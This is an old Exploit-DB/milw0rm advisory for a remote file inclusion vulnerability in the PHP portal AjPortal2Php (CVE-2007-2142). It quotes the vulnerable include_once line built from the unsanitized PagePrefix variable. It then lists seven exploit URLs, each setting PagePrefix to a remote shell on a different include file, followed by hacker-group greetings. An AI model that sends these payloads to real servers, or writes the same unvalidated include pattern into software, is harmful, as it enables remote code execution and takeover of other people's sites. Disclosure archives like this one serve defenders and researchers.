AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

EDB-ID: 3752	CVE: 2007-2142	OSVDB-ID: 37565
Author: Alkomandoz Hacker	Published: 2007-04-17	Verified:
Exploit Code:	Vulnerable App: N/A

#   [ AjPortal2Php]
# Class:     File Include Vulnerability
# Remote:    Yes
# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip
# Author:    Alkomandoz Hacker
# Contact:   alkomandoz-hacker@hotmail.com
#############################################################
file ;
begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php
======================================================
Vuln Code
include_once($PagePrefix.'includes/configuration.inc.php');
=======================================================
Exploit :
[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell
----  Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]
---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM
# milw0rm.com [2007-04-17]

Comments

AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

Rating

No comments so far